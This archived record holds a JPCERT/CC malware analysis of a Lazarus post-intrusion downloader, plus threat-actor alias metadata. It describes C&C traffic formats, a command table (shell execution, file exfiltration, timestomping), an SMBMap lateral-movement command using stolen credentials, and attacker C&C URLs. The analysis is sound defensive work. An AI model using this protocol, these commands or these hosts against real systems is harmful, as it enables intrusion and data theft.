{ "id": "9c006310-8bec-41da-b85c-9497427e9435", "created_at": "2026-04-06T00:09:06.939425Z", "updated_at": "2026-04-10T03:38:19.714233Z", "deleted_at": null, "sha1_hash": "6dce6d69149bfaf80044c03f267e5b7525f55cd3", "title": "Malware Used by Lazarus after Network Intrusion - JPCERT/CC Eyes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1197504, "plain_text": "Malware Used by Lazarus after Network Intrusion - JPCERT/CC\r\nEyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2020-08-30 · Archived: 2026-04-02 10:39:53 UTC\r\nLazarus\r\nJPCERT/CC has observed attack activity by Lazarus (also known as Hidden Cobra) targeting Japanese\r\norganisations. Different types of malware are used during and after the intrusion. This article introduces one of the\r\ntypes of malware used after the intrusion.\r\nMalware Overview\r\nThis malware downloads and executes modules. It is saved as a .drv file in a folder such as C:\r\n¥Windows¥System32¥ and run as a service. It is obfuscated by using VMProtect. The file has some unnecessary\r\ndata at the end, which increases the file size up to about 150MB. Figure 1 shows the flow of events until the\r\nmalware runs.\r\nFigure 1: Malware behaviour\r\nThe following sections will explain the details of the malware as to configuration, communication format and\r\nmodules.\r\nConfiguration\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 1 of 11\n\nThe configuration of the malware (size: 0x6DE) is encrypted and stored in a registry entry and loaded when\r\nexecuted. In this analysis, it was confirmed that the configuration is stored at the following directory:\r\nKey: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\eventlog\\Application\r\nValue: Emulate\r\nFigure 2 is an example of decoded configuration. It contains an encryption key as well as C\u0026C server\r\ninformation. (Please see Appendix A for details.)\r\nFigure 2: Example of configuration\r\nObfuscation\r\nAll strings in the malware are encrypted with AES128. The encryption key is hardcoded in the malware. Figure 3\r\nis an example of an encryption key. Since the malware converts the 16-letter string to wide character (32 bytes),\r\nonly the first 16 bytes is used as a key.\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 2 of 11\n\nFigure 3: Example of AES encryption key\r\nWindows API name is also AES-encrypted. After decrypting API strings, the address for the APIs that are called\r\nby LoadLibrary and GetProcAddress are resolved.\r\nFigure 4: Windows API obfuscation\r\nC\u0026C server communication\r\nBelow is an example of HTTP POST request that the malware first sends.\r\nPOST /[Path] HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nCookie: token=[a 4-digit random value][a 4-digit authentication key][times of communication]\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7\r\nContent-Length: [Size]\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 3 of 11\n\nHost:[Server]\r\n[param]=[Base64 data]\r\nThe parameter ([param]) for the POST data is randomly selected from the following.\r\ntname;blogdata;content;thesis;method;bbs;level;maincode;tab;idx;tb;isbn;entry;doc;category;articles;p\r\nThe value in the POST data is Base64-encoded string of the following data.\r\n[default AES Key]@[Unique ID]\r\nIf a value which is identical to the “4-digit authentication key” in the Cookie (Base64-encoded) is returned as a\r\nresponse from a C\u0026C server, the malware sends the following information.\r\nAfter the second communication, the malware sends the following HTTP POST request.\r\nPOST /[Path] HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7\r\nContent-Length: [Size]\r\nHost: [Server]\r\nCookie: token=[numeric value]; JSESSIONID=[Session ID]\r\n[param]=[Data1 (Base64 + AES)][Data2 (Base64 + AES)]\r\nThe parameter for the POST data is randomly selected from the aforementioned list. The POST data contains two\r\npieces of information. \"Data1\" contains commands while \"Data2\" indicates the result of command execution and\r\nother additional data. (Please see Table B-1 and B-2 in Appendix B for details.)\r\nThe format of the response data is same as the request except that it lacks parameter. The response data is AES-encrypted and then Base64-encoded as in the POST data. The difference is that the “+” sign is replaced by a\r\nspace.\r\nFigure 5 is a flow of communication from the beginning of its communication with a C\u0026C server until\r\ndownloading a module. In the second communication, the malware sends a new AES key, which encrypts the\r\ncommunication that follows.\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 4 of 11\n\nFigure 5: Malware communication flow\r\nAt the third communication, a module is downloaded. Below is an example of response from a C\u0026C server when\r\ndownloading a module.\r\nHTTP/1.1 200 OK\r\nDate: Tue, 25 Jun 2020 21:30:42 GMT\r\nServer: Apache/2.4.26 (Unix) OpenSSL/1.0.1\r\nContent-Encoding: ISO-8859-1\r\nContent-Type: text/html;charset=ISO-8859-1\r\nAccess-Control-Allow-Origin: *\r\nKeep-Alive: timeout=5, max=98\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\n1ff8\r\n85RR0p8Pq3VfTrSugxgO2Q==Bjpj4qAKXKypb9JFS8IVYleb2P8vp9axDdXCBd…\r\nDownloaded module\r\nAfter a module is successfully downloaded, it performs the main functions such as receiving commands from the\r\nC\u0026C server. (Information including C\u0026C servers and an encryption key are provided by malware as an\r\nargument.) The downloaded module is UPX-encrypted as in Figure 6.\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 5 of 11\n\nFigure 6: Downloaded module decoded\r\nThe communication is performed in the mostly same format as mentioned earlier. It is confirmed that the module\r\noffers multiple functions including the following: (See Appendix C for details.)\r\nOperation on files (create a list, delete, copy, modify time created)\r\nOperation on processes (create a list, execute, kill)\r\nUpload/download files\r\nCreate and upload a ZIP file of arbitrary directory\r\nExecute arbitrary shell command\r\nObtain disk information\r\nModify system time\r\nLateral movement\r\nFor the purpose of lateral movement, SMBMap[1], a Python tool which allows access to remote host via SMB,\r\nwas used after converting it as a Windows PE file with Pyinstaller. Attackers spread infection laterally by\r\nleveraging account information which they had obtained beforehand.\r\n[File_Name].exe -u USERID -p PASSWORD=[password] -H [IP_Address] -x \"c:\\windows\\system32rundll32.exe\r\nIn closing\r\nActivities by Lazarus have been reported by many different organisations, and attacks are observed in multiple\r\ncountries. It is possible that similar cases continue to be observed in Japan as well.\r\nC\u0026C server information of the samples mentioned in the article are listed in Appendix D. Please make sure that\r\nnone of your device is communicating with these hosts.\r\nShusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 6 of 11\n\nReference\r\n[1] GitHub: SMBMap\r\nhttps://github.com/ShawnDEvans/smbmap\r\nAppendix A: Configuration\r\nTable A: List of configuration\r\nOffset Description Remarks\r\n0x000 Number of C\u0026C servers Up to 5\r\n0x004 C\u0026C server 1\r\n0x104 C\u0026C server 2\r\n0x204 C\u0026C server 3\r\n0x304 C\u0026C server 4\r\n0x404 C\u0026C server 5\r\n0x504 Not assigned Contains \"cmd.exe\"\r\n0x604 Operation time\r\n0x616 Sleep time\r\n0x626 Version information Contains \"x64_1.0\"\r\n0x676 Flag for unique ID\r\n0x67A Unique ID Creates a unique value based on the computer name\r\n0x6B6 AES Key\r\nAppendix B: Contents of data exchanged\r\nTable B-1: Data1 format (decrypted)\r\nOffset Length Contents\r\n0x00 4 Data1 size\r\n0x04 2 Random data\r\n0x06 2 Command\r\n0x08 4 Data2 size\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 7 of 11\n\n0x0C 2 Random or additional command\r\nTable B-2: Data2 format (decrypted)\r\nOffset Length Contents\r\n0x00 4 Data2 size\r\n0x04 - Data (depends on the command)\r\nAppendix C: Commands\r\nTable C: List of commands\r\nValue Contents\r\n0xABCF Get current directory\r\n0xABD5 Get file list\r\n0xABD7 Get process list\r\n0xABD9 Kill process\r\n0xABDB Execute process\r\n0xABDD Execute process (CreateProcessAsUser)\r\n0xABE1 Download file\r\n0xABE3 Upload file\r\n0xABE9 Upload files (create a ZIP)\r\n0xABEB Modify file creation time (timestomp)\r\n0xABED Change local time\r\n0xABF5 Delete file (sdelete)\r\n0xABF7 Execute shell command\r\n0xABF9 Check connection\r\n0xAC03 -\r\n0xAC05 -\r\n0xAC07 Change C\u0026C server\r\n0xAC0D Get disk/file information\r\n0xAC15 Change current directory\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 8 of 11\n\n0xAC17 -\r\n0xAC19 Get load process information\r\n0xAC27 Copy file\r\nAppendix D: C\u0026C server\r\nhttps://gestao.simtelecomrs.com.br/sac/digital/client.jsp\r\nhttps://sac.onecenter.com.br/sac/masks/wfr_masks.jsp\r\nhttps://mk.bital.com.br/sac/Formule/Manager.jsp\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nRelated articles\r\nUpdate on Attacks by Threat Group APT-C-60\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 9 of 11\n\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nDslogdRAT Malware Installed in Ivanti Connect Secure\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 10 of 11\n\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html" ], "report_names": [ "Lazarus-malware.html" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805", "created_at": "2023-07-20T02:00:08.724751Z", "updated_at": "2026-04-10T02:00:03.341845Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "MISPGALAXY:APT-C-60", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854", "created_at": "2024-12-28T02:01:54.668462Z", "updated_at": "2026-04-10T02:00:04.564201Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "ETDA:APT-C-60", "tools": [ "SpyGlace" ], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434146, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6dce6d69149bfaf80044c03f267e5b7525f55cd3.pdf", "text": "https://archive.orkl.eu/6dce6d69149bfaf80044c03f267e5b7525f55cd3.txt", "img": "https://archive.orkl.eu/6dce6d69149bfaf80044c03f267e5b7525f55cd3.jpg" } }